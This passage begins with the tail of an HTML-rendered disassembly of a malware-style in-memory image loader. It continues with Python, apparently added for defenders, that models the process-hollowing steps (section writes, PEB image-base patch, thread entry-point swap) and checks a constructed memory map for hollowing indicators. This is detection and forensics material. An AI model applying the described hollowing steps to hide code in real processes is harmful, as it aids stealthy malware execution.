style="color:black">CODE:004026FB </span><span style="color:green">154 </span><span style="color:navy">pop ebx</span> <span style="color:black">CODE:004026FC </span><span style="color:green">150 </span><span style="color:navy">mov esp</span><span style="color:navy">, ebp</span> <span style="color:black">CODE:004026FE </span><span style="color:green">008 </span><span style="color:navy">pop ebp</span> <span style="color:black">CODE:004026FF </span><span style="color:green">004 </span><span style="color:navy">retn </span><span style="color:green">4</span> <span style="color:black">CODE:004026FF </span><span style="color:black">CODE:004026FF </span><span style="background:red">launch_image_in_memory endp</span><span style="background:red"> ; sp-analysis failed</span> <span style="color:black">CODE:004026FF </span><span style="color:black">CODE:004026FF </span><span style="color:gray">; --------------------------------------------------------------------------- </span> </pre> </span> </body> </html>
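The section loop, the PEB+8 patch and the SetThreadContext entry-point swap above are the three things a memory forensics check has to recognise. The following Python is an added defender-side model, not code from the listing or its author: it reads the same PE fields the loader reads (NumberOfSections at PE+6, AddressOfEntryPoint at PE+0x28, 40-byte section headers with VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData and Characteristics at +8, +0Ch, +10h, +14h and +24h) and predicts the regions and page protections a hollowed target ends up with, then flags two artefacts of that state in a constructed region list. The characteristics-to-protection mapping is the standard Windows one, assumed because the body of convert_section_characteristics_2_memory_protection is not on the page; the sample PE header and the region list are constructed.

```python
import struct

# IMAGE_SCN_* and PAGE_* constants as defined in the Win32 SDK headers.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE = 0x01, 0x02, 0x04
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x10, 0x20, 0x40
EXECUTABLE_PAGE_MASK = 0xF0   # every PAGE_EXECUTE* value has a bit in this nibble


def section_characteristics_to_protection(chars: int) -> int:
    """Standard Windows mapping IMAGE_SCN_MEM_* -> PAGE_*. Assumption: the
    loader's own conversion routine is not shown on the page, so this is the
    documented image-loader mapping, not that routine's code."""
    x = bool(chars & IMAGE_SCN_MEM_EXECUTE)
    w = bool(chars & IMAGE_SCN_MEM_WRITE)
    r = bool(chars & IMAGE_SCN_MEM_READ)
    if x:
        return PAGE_EXECUTE_READWRITE if w else (PAGE_EXECUTE_READ if r else PAGE_EXECUTE)
    if w:
        return PAGE_READWRITE
    return PAGE_READONLY if r else PAGE_NOACCESS


def expected_layout(image: bytes, base: int) -> dict:
    """Predict what the listing's section loop leaves in the target process:
    per section the address, sizes and protection it receives, plus the entry
    point that SetThreadContext places in eax. Offsets match the listing."""
    pe = struct.unpack_from("<I", image, 0x3C)[0]               # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", image, pe + 6)[0]   # movzx eax, [eax+6]
    size_opt = struct.unpack_from("<H", image, pe + 0x14)[0]
    entry = struct.unpack_from("<I", image, pe + 0x28)[0]       # mov eax, [eax+28h]
    table = pe + 0x18 + size_opt
    sections = []
    for n in range(num_sections):
        hdr = table + n * 40                                    # esi + (n*5)*8
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, hdr + 8)
        chars = struct.unpack_from("<I", image, hdr + 0x24)[0]
        sections.append({
            "name": image[hdr:hdr + 8].rstrip(b"\0").decode(),
            "address": base + va,          # lpBaseAddress / lpAddress
            "write_size": raw_size,        # nSize for WriteProcessMemory
            "protect_size": vsize,         # dwSize for VirtualProtectEx
            "source_offset": raw_ptr,      # lpBuffer = decrypted image + this
            "protection": section_characteristics_to_protection(chars),
        })
    return {"entry_point": base + entry, "sections": sections}


def hollowing_indicators(peb_image_base: int, exe_path: str, regions: list) -> list:
    """Two checks over a region list of the kind VirtualQueryEx plus
    GetMappedFileName yields (constructed here): the PEB+8 patch leaves
    PEB.ImageBaseAddress pointing at memory not backed by the host exe, and
    the WriteProcessMemory'd sections are private memory, not an image map."""
    findings = []
    hit = next((r for r in regions if r["base"] <= peb_image_base < r["base"] + r["size"]), None)
    if hit is None or hit["type"] != "MEM_IMAGE" or hit["path"] != exe_path:
        findings.append("PEB.ImageBaseAddress 0x%X not backed by %s" % (peb_image_base, exe_path))
    for r in regions:
        if r["protection"] & EXECUTABLE_PAGE_MASK and r["type"] == "MEM_PRIVATE":
            findings.append("private executable region at 0x%X" % r["base"])
    return findings


def build_sample_image() -> bytes:
    """Constructed minimal PE32 header with two sections; not a real binary."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)             # e_lfanew
    pe = 0x80
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, pe + 4, 0x14C, 2)      # Machine, NumberOfSections
    struct.pack_into("<H", img, pe + 0x14, 0xE0)        # SizeOfOptionalHeader
    struct.pack_into("<H", img, pe + 0x18, 0x10B)       # PE32 magic
    struct.pack_into("<I", img, pe + 0x28, 0x1000)      # AddressOfEntryPoint
    table = pe + 0x18 + 0xE0
    for i, (name, vsize, va, rsize, rptr, chars) in enumerate([
        (b".text", 0x800, 0x1000, 0x200, 0x200, 0x60000020),   # CODE|EXECUTE|READ
        (b".data", 0x100, 0x2000, 0x200, 0x400, 0xC0000040),   # IDATA|READ|WRITE
    ]):
        h = table + i * 40
        img[h:h + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", img, h + 8, vsize, va, rsize, rptr)
        struct.pack_into("<I", img, h + 0x24, chars)
    return bytes(img)


if __name__ == "__main__":
    layout = expected_layout(build_sample_image(), 0x400000)
    for s in layout["sections"]:
        print("%-6s write %#x bytes at %#x, protect as %#x" % (s["name"], s["write_size"], s["address"], s["protection"]))
    # Constructed view of a hollowed target: host image gone, private RX memory at the patched base.
    regions = [{"base": 0x400000, "size": 0x3000, "protection": PAGE_EXECUTE_READ, "type": "MEM_PRIVATE", "path": ""}]
    print(hollowing_indicators(0x400000, r"C:\host.exe", regions))
```

On a live system the region list would come from VirtualQueryEx and the PEB base from ReadProcessMemory of the PEB; the comparison logic is the same.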